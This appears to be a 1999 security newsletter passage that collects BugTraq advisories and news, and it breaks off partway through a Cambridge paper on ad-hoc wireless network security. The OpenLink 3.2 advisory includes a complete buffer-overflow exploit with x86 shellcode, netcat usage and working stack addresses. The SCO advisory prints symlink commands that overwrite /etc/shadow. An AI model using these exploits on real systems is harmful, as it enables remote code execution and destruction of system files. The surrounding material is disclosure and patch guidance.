http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu To: BugTraq Subject: OpenLink 3.2 Advisory Date: Fri Oct 15 1999 05:37:36 Author: Tymm Twillman Message-ID: s Hmm. I wonder if I should start numbering these things now. 8) Overview: A serious security hole has been found in the web configuration utility that comes with OpenLink 3.2. This hole will allow remote users to execute arbitrary code as the user id under which the web configurator is run (inherited from the request broker, oplrqb). The hole is a run-of-the-mill buffer overflow, due to lack of parameter checking when strcpy() is used. Background: OpenLink is a database request broker, used for a generic interface to different database vendors' products. By default, a web configuration utility is installed, which runs at port 8000. For more information, see OpenLink Software's web site at http://www.openlinksw.com. Exploit: This exploit has been coded to be benign, and is just for illustration of the hole in the configuration utility. Furthermore, it has not been coded for portability (no promises that it will function if compiled with anything other than egcs-2.91.66, and it will not compile on a non-x86 compiler). This works against the linux glibc version of OpenLink 3.2's configurator. It can easily be modified for other purposes, however, and I have reason to believe that the majority, if not all, platforms are vulnerable to such an attack. A stack address may be specified on the command line (I've had luck with 0xbffffb65, 0xbffffb85 or 0xbffffbe5). Output of this should be piped through netcat, e.g. ./oplwall 0xbffffb85 | nc machine.to.hit 8000 --- cut --- #include #include /* * Exploit for Openlink's web configurator for Linux/glibc2 * use: pipe through netcat to openlink web port (8000 default) * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000 * makes www_sv execute /usr/bin/wall if you hit the address right * * For informational purposes only. This was written to show that * there's a problem, not for skr1pt k1dd33z --. * don't ask me for help on how to use this to crack systems, * help compiling or anything else. It will only compile on * an x86 compiler however. * * Addresses that work for me: 0xbffffb65 (initial run of the broker) * 0xbffffb85 (all consecutive attempts) * probably tied to process ID www_sv runs as; * first try PIDs were in triple digits, others * 4 digit PIDs. * * If this works, generally no more www_sv processes will be run as a side effect. */ void test() { __asm__(" jmp doit exploit: # code basically from Aleph One's smash stacking article, with # minor mods popl %esi movb $0xd0, %al # Get a / character into %al xorb $0xff, %al movb %al, 0x1(%esi) # drop /s into place movb %al, 0x5(%esi) movb %al, 0x9(%esi) xorl %eax,%eax # clear %eax movb %eax,0xe(%esi) # drop a 0 at end of string movl %eax,0x13(%esi) # drop NULL for environment leal 0x13(%esi),%edx # point %edx to environment movl %esi,0xf(%esi) # drop pointer to argv leal 0xf(%esi),%ecx # point %ecx to argv movl %esi,%ebx # point ebx to command - 1 inc %ebx # fix it to point to the right place movb $0xb,%al # index to execve syscall int $0x80 # execute it xorl %ebx,%ebx # if exec failed, exit nicely... movl %ebx,%eax inc %eax int $0x80 doit: call exploit .string \"..usr.bin.wall.\" "); } char *shellcode = ((char *)test) + 3; char code[1000]; int main(int argc, char *argv[]) { int i; int left; unsigned char where[] = {"\0\0\0\0\0"} ; int *here; char *dummy; long addr; if (argc > 1) addr = strtoul(argv[1], &dummy, 0); else addr = 0xbffffb85; fprintf(stderr, "Setting address to %8x\n", addr); *((long *)where) = addr; strcpy(code, shellcode); for (i = 0; i < 64; i++) { strcat(code, where); } printf("GET %s\n", code); exit(0); } --- cut --- Workaround: Disable the www_sv application in oplrqb.ini. By default there is a section labeled Persistent Services, with the line "Configurator = www_sv". This section, along with the entire www_sv section, should be commented out with semicolons, e.g. ;[Persistent Services] ;Configurator = www_sv ;[www_sv] ;Program = w3config/www_sv ;Directory = w3config ;CommandLine = ;Environment = WWW_SV ;[Environment WWW_SV] Discussion: OpenLink software has been notified of the problem is is apparently working on a solution. I have serious concerns that the package may be prone to other attacks, but have no confirmation of this (other than basic DOS attacks). My suggestion is to definitely make sure any machine running the OpenLink broker is well protected behind a firewall, and it should not allow logins from untrusted persons. Kudos to: Aleph One, for his long-lived stack smashing article, and this whole BugTraq thing. Hobbit, of course, for netcat. -Tymm @HWA 76.0 RedHat PAM NIS Locked Accounts Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 697 class Access Validation Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 13, 1999 updated October 13, 1999 vulnerable RedHat Linux 6.1 not vulnerable RedHat Linux 6.0.0 RedHat Linux 5.2.0 RedHat Linux 5.1.0 RedHat Linux 5.0.0 Under some network configurations it may be possible to access locked NIS accounts due to a vulnerability in the PAM authentication modules shipped with RedHat version 6.1. This can lead to a local compromise where the password is known for a locked account. RedHat 6.1 for Intel platforms is the only vulnerable version. The patched versions (binary and source) are available at the location below: ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm credit Exposed in RedHat advisory "RHSA-1999:040: New PAM packages available", published on Oct 13, 1999. reference advisory: RHSA-1999:040: New PAM packages available (RedHat) http://www.securityfocus.com/templates/advisory.html?id=1789 web page: Updates, Fixes, and Errata Page (RedHat) http://www.redhat.com/corp/support/errata/index.html RHSA-1999:040: New PAM packages available Published: Wed Oct 13 1999 Updated: Wed Oct 13 1999 1. Topic: Under some network configurations PAM (Pluggable Authentication Modules) will fail to lock access to disabled NIS accounts. 2. Problem description: The PAM packages shipped with Red Hat Linux 6.1/Intel may allow access to locked NIS accounts on certain network configurations. If you have a Red Hat Linux 6.1 workstation performing authentication against a NIS server then you are at risk. Red Hat recommends that you upgrade the PAM packages on all Red Hat Linux 6.1 workstations to the versions announced in this advisory. Previous versions of Red Hat Linux are not affected by this problem. 3. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info): 4. Relevant releases/architectures: Red Hat Linux 6.1 for i386 5. Obsoleted by: N/A 6. Conflicts with: N/A 7. RPMs required: ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm 8. Solution: For each RPM for your particular architecture, run: rpm -Uvh where filename is the name of the RPM. 9. Verification: MD5 sum Package Name 9fd42c57d02ac039093b6f94132eee0e SRPMS/pam-0.68-8.src.rpm e8d5b9edf5dc9998ee19d91b7620f2ad i386/pam-0.68-8.i386.rpm These packages are GPG signed by Red Hat Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg 10. References: Cristian @HWA 77.0 Microsoft IE5 IFRAME Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 696 class Access Validation Error cve GENERIC-MAP-NOMATCH remote Yes local No published October 11, 1999 updated October 15, 1999 vulnerable Microsoft Internet Explorer 5.0 for Windows NT 4.0 + Microsoft Windows NT 4.0 Microsoft Internet Explorer 5.0 for Windows 98 + Microsoft Windows 98 Microsoft Internet Explorer 5.0 for Windows 95 + Microsoft Windows 95 Microsoft Internet Explorer 5.0 for Windows 2000 - Microsoft Windows NT 2000.0 Microsoft Internet Explorer 4.0.1 for Windows NT 4.0 - Microsoft Windows NT 4.0 Microsoft Internet Explorer 4.0.1 for Windows 98 - Microsoft Windows 98 Microsoft Internet Explorer 4.0.1 for Windows 95 - Microsoft Windows 95 Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model. Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented. Georgi Guninski has created a demonstration, available at: http://www.nat.bg/~joro/execcommand.html The code is as follows: Microsoft has released patches for IE 4.01 and IE5. The IE 4.01 patch is included as part of the IE 4.01 Service Pack 2, available via: http://www.microsoft.com/windows/ie/download/windows.htm The IE5 patch is available as an individual fix from: Intel: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe Alpha: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe The Microsoft Advisory MS 99-042 notes: "The IE5 patch also includes the previously-released fix for the "Download Behavior" vulnerability, discussed in http://www.microsoft.com/security/bulletins/ms99-040.asp." credit Posted to Bugtraq on October 11, 1999 by Georgi Guninski . reference advisory: MS99-042: Patch Available for "IFRAME ExecCommand" Vulnerability (MS) http://www.securityfocus.com/templates/advisory.html?id=1788 message: IE 5.0 security vulnerability - reading local (and from any domain, probably win (Georgi Guninski ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=38020E75.7966C579@nat.bg web page: Microsoft Security Bulletin (MS99-042): Frequently Asked Questions (Microsoft) http://www.microsoft.com/security/bulletins/MS99-042faq.asp web page: Q243638: Update Available for "IFRAME ExecCommand" Vulnerability in Internet Exp (Microsoft) http://support.microsoft.com/support/kb/articles/q243/6/38.asp To: BugTraq Subject: IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Date: Mon Oct 11 1999 14:21:09 Author: Georgi Guninski Message-ID: <38020E75.7966C579@nat.bg> IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is vulnerable) allows reading local files, text and HTML files from any domain and probably window spoofing (have not tested window spoofing but believe it is possible) It is also possible in some cases to read files behind fiewall. Details: The problem is the combination of IFRAME and document.execCommand. Normally, you cannot use execCommand on an IFRAME from another domain. But if you do: "IFRAME.focus(); document.execCommand" then command will be executed in the IFRAME (some commands do not work in this way, but some do and that is enough). So, we create an IFRAME with SRC="file://c:/test.txt" and inject JavaScript code in it. When the JavaScript code is executed, it is executed in the security context of the IFRAME - the "file:" protocol. The injection is done using the "InsertParagraph" command (guess other commands will do) which sets the ID of the paragraph. But if you place a " in the ID, then a STYLE tag may be inserted also. The JavaScript code is injected using the STYLE tag: STYLE="left:expression(eval(JSCode))" This vulnerability may be exploited using HTML email message or a newsgroup posting. The code is: ---------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/execcommand.html Regards, Georgi Guninski http://www.nat.bg/~joro @HWA 78.0 SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bugtraq id 701 object /etc/sysadm.d/bin/userOsa (exec) class Origin Validation Error cve GENERIC-MAP-NOMATCH remote No local Yes published October 11, 1999 updated October 13, 1999 Vulnerable SCO Open Server 5.0.5 SCO Open Server 5.0.4 SCO Open Server 5.0.3 SCO Open Server 5.0.2 SCO Open Server 5.0.1 SCO Open Server 5.0 Under certain versions of SCO OpenServer there exists a symlink vulnerability which can be exploited to overwrite any file which is group writable by the 'auth' group. The problem in particular is in the the /etc/sysadm.d/bin/userOsa executable. When given garbage output the program will write out a debug log. However, the program does not check to see if it overwriting a currently existing file nor wether it is following a symlink. Therefore is it possible to overwrite files with debug data which are both in the 'auth' group and are writable by the same group. Both /etc/shadow & /etc/passwd fall into this category. If such an attack were launched against these files the system would be rendered unusable. As per Brock Tellier's original posting to Bugtraq: scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- BEFORE EXPLOIT: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old AFTER EXPLOIT (note the file size): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# credit This vulnerability was posted to the Bugtraq mailing list by "Brock Tellier" on Mon, 11 Oct 1999. reference message: SCO OpenServer 5.0.5 overwrite /etc/shadow (Brock Tellier ) http://www.securityfocus.com/templates/archive.pike?list=1&msg=02e601bf1426$b1043920$3177a8c0@webley web page: Patches and Supplements from SCO (SCO) http://www.sco.com/support/ftplists/index.html web page: SCO Secure Technologies Group (SCO) http://www.sco.com/security/ To: BugTraq Subject: SCO OpenServer 5.0.5 overwrite /etc/shadow Date:Mon Oct 11 1999 02:24:59 Author: Brock Tellier Message-ID: <02e601bf1426$b1043920$3177a8c0@webley> Greetings, Any user may overwrite any file with group auth (i.e. /etc/shadow, /etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not change the permissions of the file or allow for the user to input a passwd entry string into these files, it will simply clobber the contents of the file with debug output. When userOsa recieves invalid input, it generates a log file called "debug.log" in the PWD. This file is created with group auth permissions,does not check for this file's existence, and will follow symlinks. Thus the exploit is as follows: scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- BEFORE EXPLOIT: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old AFTER EXPLOIT (note the file size): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# Brock Tellier UNIX Systems Administrator @HWA 79.0 ARE VIRUSES Y2K COMPLIANT? ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Thursday 21st October 1999 on 11:30 am CET As if there isn't enough uncertainty about Y2K, computer virus experts advise extra care to inoculate before the century turns, lest a virus take advantage of Y2K chaos. Their concern? Not only viruses targeting y2k, but also the new year awakening dormant old viruses. A millennium virus may go unnoticed in the Y2K confusion. A virus set to activate as the calendar rolls over might cause damage that people will blame on Y2K, which would allow the virus to spread more quickly, say some experts. Are Viruses Y2K Compliant? Be ready: Virus authors may target Y2K, or the new year may awaken dormant old viruses. by Charles Bermant, special to PC World October 20, 1999, 6:30 p.m. PT As if there isn't enough uncertainty about Y2K, computer virus experts advise extra care to inoculate before the century turns, lest a virus take advantage of Y2K chaos. Their concern? A millennium virus may go unnoticed in the Y2K confusion. A virus set to activate as the calendar rolls over might cause damage that people will blame on Y2K, which would allow the virus to spread more quickly, say some experts. On the other hand, virus authors are an egotistical bunch who may not want to share their 15 minutes of fame with another media event like the new millennium. Virus Opportunity "We expect there will be some kind of virus attack," says Sal Viveros, Network Associates group marketing manager for the Total Virus Defense Product, which includes McAfee VirusScan. "When systems fail, administrators might not think of a virus and head off on a wild goose chase in order to solve the problem." Network Associates has already found six viruses keyed to Y2K, Viveros says. He expects many more are set to deliver their payload either January 1 or on January 3, when people return to work. Antivirus vendor Panda Software sounded the alarm early. Its Web site warns that many viruses rely on date stamps to operate, and it's uncertain how they'll behave in 2000. "Y2K has an unpredictable effect, and you can't just leave it to chance," says Pedro Bustamante, executive director of Panda's U.S. office. "A lot of people have outdated virus [protection] programs, and this gives them a false sense of security." Like the potential effect of Y2K on banking, power, and software, no one can say for sure what viruses will do. Perhaps virus authors will take the opportunity to create a monumental meanie. "There might be a few new viruses written that the author hopes will not be noticed in the general background noise of champagne corks popping," says Ross M. Greenberg, an author of early antivirus products and former manager of MSN's Computing Central's Safe Computing Forum. "But, generally, a virus author wants their little creation to be noticed. There would be no delight in their creation's damage not being credited to whatever name they hide behind if Y2K took the credit for it." Viveros disagrees, saying that Y2K is the ultimate challenge for a virus author. "What better time to unleash a virus than when everyone is watching?" Viveros asks. @HWA 80.0 COMPUTER SECURITY AT CENTER OF DOE PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Thursday 21st October 1999 on 11:00 am CET The former director of the Energy Department's Office of Safeguards and Security today outlined for Congress years of cybersecurity problems at the nation's nuclear weapons laboratories, claiming officials were aware of ongoing espionage but failed to do anything about it. "A variety of computer security tools and techniques, such as encryption devices, firewalls and disconnect features, are required by policy; however, these policies were frequently ignored." Federal Computer Week. OCTOBER 20, 1999 . . . 18:06 EDT Computer security at center of DOE problems, top officials say BY DANIEL VERTON (dan_verton@fcw.com) The former director of the Energy Department's Office of Safeguards and Security today outlined for Congress years of cybersecurity problems at the nation's nuclear weapons laboratories, claiming officials were aware of ongoing espionage but failed to do anything about it. Edward McCallum, the former chief of DOE security who is now detailed to the Defense Department as the Pentagon's acting director of the Combating Terrorism Technology Support Office, said DOE officials "knew our greatest secrets were being stolen and . . . did nothing about it." McCallum, who testified today before the House Armed Services Committee's Military Procurement Subcommittee, said efforts by his office dating to 1995 to enhance DOE cybersecurity met with "significant laboratory resistance" and ultimately failed. "Several laboratories and their program assistant secretaries in Washington, [D.C.], believed that protection, such as firewalls and passwords, was unnecessarily expensive and a hindrance to science," McCallum said. "A variety of computer security tools and techniques, such as encryption devices, firewalls and disconnect features, are required by policy; however, these policies were frequently ignored." Retired Air Force Gen. Eugene Habiger, director of DOE's Office of Security and Emergency Operations, told committee members that during his review of DOE security measures, under way since he took the post in June, he discovered that the department had lost its focus on security. "By-products of this organizational dysfunction and lack of focus included . . . a lack of attention to our cybersecurity practices in a world of increased computer hacking and cyberterrorism," said Habiger. McCallum identified the lack of protection afforded classified information systems and the ease with which that information could be transferred to and from classified systems as one of the DOE's primary security weaknesses. "Something as simple as using different size floppy disks between classified and unclassified systems was rejected as unnecessary," he said. "Indeed, I believe we are sitting at the center of the worst spy scandal in our nation's history." Habiger also laid blame on Congress' failure to fund additional cybersecurity initiatives requested by DOE in the department's fiscal 2000 budget proposal. "We have valid requirements in the area of cybersecurity to buy hardware, encryption equipment and to train our system administrators," Habiger said. However, "simply stated, we have been given a mandate but not the additional resources to accomplish that mandate." @HWA 81.0 US REVISITS SOURCE CODE LIMITS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 11:50 pm CET The Clinton administration is considering relaxing export limits on computer source code for data scrambling programs, in a possible move acknowledging the growing importance of Linux, a top export official said Tuesday. Undersecretary of Commerce William Reinsch said the administration had originally intended to maintain current export limits on source code, or instructions written by a computer programmer that can be compiled into a computer program. Following announcements by the White House on the relaxation of pre-compiled crypto, the restrictions on source code is under review now too. Wired. US Revisits Source Code Limits Reuters 3:00 a.m. 20.Oct.99.PDT The Clinton administration is considering relaxing export limits on computer source code for data scrambling programs, in a possible move acknowledging the growing importance of Linux, a top export official said Tuesday. Undersecretary of Commerce William Reinsch said the administration had originally intended to maintain current export limits on source code, or instructions written by a computer programmer that can be compiled into a computer program. But after the administration announced it would significantly relax many of its limits on already compiled computer encryption programs, high-tech companies complained that retaining the source code limit was unworkable, Reinsch said in a telephone interview. "We are now reviewing that," Reinsch said. "It's on the table as [an] area where we might make a revision." Revised encryption export rules will be released by 15 December, he said, with any possible changes for source code export likely included at that time. Encryption, which uses mathematical formulas to scramble information and protect it from prying eyes, is now included in everything from Web browsers and email programs to cable television set-top boxes and handheld computers. Traditionally, software companies sold finished programs but kept the source code underlying their programs a tightly guarded secret. Microsoft, for example, has never published the source code underlying its Windows operating system. More recently, a movement of "open source" software has gained momentum, including a version of the Unix operating system developed by Linus Torvalds and known as Linux. Source code of such programs is made freely available to anyone, usually over the Internet. But the export rules consider posting source code on the Internet, where people in other countries can download it, a form of export. That creates problems for US programmers that want to include encryption features for Linux or other "open source" programs. A three-judge panel of the Ninth US Court of Appeals ruled in May that the source code export limits were a violation of the First Amendment's free speech guarantee, but the decision is being reviewed by the full appeals court. Computer science professor Daniel Bernstein filed the lawsuit so he could post an encryption program he had written on the Internet. A change in the export rules could render the case moot. Copyright 1999 Reuters Limited. @HWA 82.0 SECURITY FOR AD-HOC WIRELESS NETWORKS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by Thejian, Wednesday 20th October 1999 on 11:30 pm CET The Resurrecting Duckling is a security policy model which describes secure transient association of a device with multiple serialised owners. Basically a nice description on some of the security issues in wireless networks and ways to battle those. Cambridge paper. The Resurrecting Duckling: Security Issues for Ad-hoc Wireless Networks Frank Stajano and Ross Anderson In the near future, many personal electronic devices will be able to communicate with each other over a short range wireless channel. We investigate the principal security issues for such an environment. Our discussion is based on the concrete example of a thermometer that makes its readings available to other nodes over the air. Some lessons learned from this example appear to be quite general to ad-hoc networks, and rather different from what we have come to expect in more conventional systems: denial of service, the goals of authentication, and the problems of naming all need re-examination. We present the resurrecting duckling security policy model, which describes secure transient association of a device with multiple serialised owners. This research was first presented at the 7th International Workshop on Security Protocols, held in Cambridge, UK, from 1999-04-19 to 1999-04-21. The proceedings will be published by Springer-Verlag in the Lecture Notes for Computer Science series. The full text of the paper is available as PDF (114 KB), gzipped PostScript (127 KB) or HTML (35 KB). A few months later, an abridged and updated version was presented at the 3rd AT&T Software Symposium, held in Middletown, NJ, USA, on 1999-10-20. The text of this version is available as PDF (70 KB) or gzipped PostScript (104 KB). http://www.cl.cam.ac.uk/~fms27/papers/duckling.pdf http://www.cl.cam.ac.uk/~fms27/papers/duckling.ps.gz http://www.cl.cam.ac.uk/~fms27/duckling/duckling.html http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.pdf http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.ps.gz The Resurrecting Duckling: Security Issues for Ad-hoc Wireless Networks Frank Stajano (1,2) and Ross Anderson (1) (1) University of Cambridge Computer Laboratory, New Museums Site, Pembroke Street, Cambridge CB2 3QG, UK name.surname@cl.cam.ac.uk (2) AT&T Laboratories Cambridge, 24a Trumpington Street, Cambridge CB2 1QA, UK fstajano@uk.research.att.com Abstract In the near future, many personal electronic devices will be able to communicate with each other over a short range wireless channel. We investigate the principal security issues for such an environment. Our discussion is based on the concrete example of a thermometer that makes its readings available to other nodes over the air. Some lessons learned from this example appear to be quite general to ad-hoc networks, and rather different from what we have come to expect in more conventional systems: denial of service, the goals of authentication, and the problems of naming all need re-examination. We present the resurrecting duckling security policy model, which describes secure transient association of a device with multiple serialised owners. Introduction The established trend in consumer electronics is to embed a microprocessor in everything-cellphones, car stereos, televisions, VCRs, watches, GPS (Global Positioning System) receivers, digital cameras-to the point that most users have already lost track of the number of items they own that contain one. In some specific environments such as avionics, electronic devices are already becoming networked; in others, work is underway. Medical device manufacturers want instruments such as thermometers, heart monitors and blood oxygen meters to report to a nursing station; consumer electronics makers are promoting the Firewire standard [firewire] for PCs, stereos, TVs and DVD players to talk to each other; and kitchen appliance vendors envisage a future in which the oven will talk to the fridge, which will reorder food over the net. We envisage that, in the near future, this networking will become much more general. The next step is to embed a short range wireless transceiver into everything; then many gadgets can become more useful and effective by communicating and cooperating with each other. A camera, for example, might obtain the geographical position and exact time from a nearby GPS unit every time a picture is taken, and record that information with the image. At present, if the photographer wants to record a voice note with the picture, the camera must incorporate digital audio hardware; in the future, the camera might let him speak into his digital audio recorder or cellphone. Each device, by becoming a network node, may take advantage of the services offered by other nearby devices instead of having to duplicate their functionality. Ad-hoc Wireless Networks This vision of embeddable wireless connectivity has been in development for several years at AT&T Laboratories Cambridge in the context of the Piconet [piconet97] project and is also being pursued, although with emphasis on different aspects, by several other groups including HomeRF [homerf-www,homerf98], IrDA [irda-www] (which uses infrared instead of radio) and Bluetooth [bluetooth-www,bluetooth98]. Everyone-including potential users-knows that wireless networking is more prone to passive eavesdropping attacks. But it would be highly misleading to take this as the only, or even the main, security concern. In this paper we investigate the security issues of an environment characterised by the presence of many principals acting as network peers in intermittent contact with each other. To base the discussion on a concrete example we shall consider a wireless temperature sensor. Nearby nodes may be authorised to request the current temperature, or to register a "watch'' that will cause the thermometer to send out a reading when the temperature enters a specific range. We wish to make our thermometer useful in the widest range of environments including environmental monitoring, industrial process control and medicine. We will therefore consider how we can enable our thermometer to support all the security properties that might be required, including confidentiality, integrity (and its close relative authenticity) and availability. Contrary to academic tradition, however, we shall examine them in the opposite order, as this often (and certainly in our case) reflects their actual importance. First, however, we have to mention some of the resource constraints under which such networks operate. System constraints The three main constraints on Piconet, and on similar systems which support ad-hoc networks of battery operated personal devices, are as follows: [Peanut CPU:] the computing power of the processor in the node is typically small, so large computations are slow. [Battery power:] the total energy available to the node is a scarce resource. The node likes to go to sleep whenever possible. It is not desirable to use idle time to perform large computations in the background. [High latency:] to conserve power, nodes are off most of the time and only turn on their receiver periodically. Communicating with such nodes involves waiting until they next wake up. The consequence of those constraints is that, while strong symmetric cryptography is feasible, modular arithmetic is difficult and so is strong asymmetric cryptography. Where a peanut node (e.g. the one embedded in a camera) interacts with a more powerful one (e.g. the one embedded in a mobile phone or laptop), one may use techniques such as low exponent RSA, with the protocols designed so that the peanut node sticks to the cheap operations of encryption and verification while avoiding the expensive ones of decryption and signature. More generally, where there is a trade-off between security and (say) battery life, we may want to let the user control this. For example, if our thermometer is used to drive a wall display in someone's living room that shows the outside temperature, then the owner is unlikely to opt for validated and encrypted communication if this means that he must change the battery every month instead of once a year. One challenge is to integrate this flexibility in the system without introducing major architectural holes of the sort that would allow the attacker, too, to turn off security at will. Availability Availability means ensuring that the service offered by the node will be available to its users when expected. In most non-military scenarios, this is the security property of greatest relevance for the user. All else counts little if the device cannot do what it should. Radio jamming In the traditional threat model-derived from the military-an attacker can deny service to the nodes in a given area by jamming the radio frequencies they use. Traditional defences include spread spectrum and frequency hopping, both of which force the attacker to jam a wider frequency band and thus use more power. We will revisit them briefly in section * below. However such concerns are of less relevance to the commercial world, where such attacks are dealt with by complaining to the authorities and having the operator of the jamming station arrested. The novel and interesting service denial threat is different, and concerns battery exhaustion. Battery exhaustion A malicious user may interact with a node in an otherwise legitimate way, but for no other purpose than to consume its battery energy. Battery life is the critical parameter for many portable devices, and many techniques are used to maximise it; in Piconet, for example, nodes try to spend most of the time in a sleep mode in which they only listen for radio signals once in a while (the period can be set from a few seconds to several minutes). In this environment, power exhaustion attacks are a real threat, and are much more powerful than better known denial of service threats such as CPU exhaustion; once the battery runs out the attacker can stop and walk away, leaving the victim disabled. We call this technique the sleep deprivation torture attack. For any public access server, there is necessarily a tension between the contrasting goals of being useful to unknown users and not succumbing to vandals. Whereas some applications can restrict access to known principals, in others (such as web servers and name servers) this is infeasible since the very usefulness of the service comes from its being universally available. If a server has a primary function (such as sending the outside temperature to the meteorological office every hour) and a distinct auxiliary function (such as sending the current temperature to anyone who requests it) then these functions can be prioritised; a reservation mechanism can ensure that the higher priority use receives a guaranteed share of the resource regardless of the number of requests generated by the lower priority uses. (The highest priority use of all may be battery management: if one can estimate fairly accurately the amount of usable energy remaining, then the service can be monitored and managed provided that the process does not itself consume too much of the resource it is intended to conserve.) Authenticity To whom can a principal talk? In some applications our thermometer will broadcast its temperature readings, but in general it will only send them to recipients who have been authorised in some way. For example, in a hospital, it might be authorised to send temperature readings to any doctor's palmtop computer or any nursing station. But it might also be required to restrict transmission (e.g. of the temperature of a celebrity) to a particular station or device. The usual authorisation mechanisms (which turn out to be the least interesting in this case) involve a centralised system administrator. This may be implemented as access control lists (the administrator tells the thermometer who is authorised) or capabilities (the administrator gives some principals a signed certificate which they present to the thermometer when they want a reading). However, the ad-hoc network environment poses a fundamental new problem: the absence of an online server. Interactions with the administrator after the thermometer has been manufactured (or personalised by the institution that owns it) may be expensive or time-consuming, as they may entail establishing a network connection to a central server (perhaps using gossiping via intermediate nodes), or bringing a management device physically close to each affected node. In the particular case of a thermometer, the device might be calibrated every six months, at which time new security state can be loaded; however, rapid changes may be too expensive for a central administrator to make regularly. It follows that the length of any validity period (whether for certificates or access control lists) will be a trade-off between timeliness and convenience. But relying on expiration dates imposes on the nodes the extra cost of running a secure clock-otherwise the holder of an expired certificate might reset a node's clock to a time within the validity period. As many Piconet nodes would not normally have an onboard clock, the classical approach to authentication is suspect. Thankfully, there is a better way. Secure transient association The novel and interesting authentication problem in ad-hoc networks of wireless devices is that of secure transient association. If a householder owns a device, say a universal remote control, that lets her control various other devices in her home (such as hi-fi and television components, the heating system, lights, curtains and even the locks and burglar alarm) then she will need to ensure that a new device she buys from the shop will obey her commands, and not her neighbour's. She will want to be assured that a burglar cannot take over the heat sensing floodlight in the garden, or unlock the back door, just by sending it a command from a remote control bought in the same shop. As well as being secure (whatever that means), the association between the controller and the peripheral must also be transient. When a householder resells or gives away her television set or hi-fi or fridge, it will have to obey another controller; when her controller breaks down (or she decides to replace it or upgrade its operating system), she must be able to regain control of all the gadgets she already owns. A central authentication service is possible for expensive consumer durables; most governments run such services for houses and cars. But there is no prospect that this will be extended to all durable consumer goods; the UK government abandoned dog licensing some years ago as uneconomic. In any case, there would be very grave civil liberties objections to the government maintaining lists of all PCs, hi-fis and DVD players in the country; the outcry over the Pentium III processor ID indicates the likely level of political resistance. Even the existing central services stop short of managing keys; the replacement of car keys is left to the motor trade, while house locks are completely uncontrolled. So it is desirable that key management be performed locally: the last thing we want is to impose an expensive and unpopular central solution. Yet it would be nice if we could still provide some means of making a stolen DVD player harder to resell. Another insight comes from scenarios where we have a pool of identical devices, such as a bowl of disinfectant containing ten thermometers. The doctor does not really care which thermometer she gets when she picks one up, but she does care that the one her palmtop talks to is the same one she is holding and not any other one in the bowl or nearby in the ward. Many more potential applications of wireless devices require establishing a secure transient association between two principals 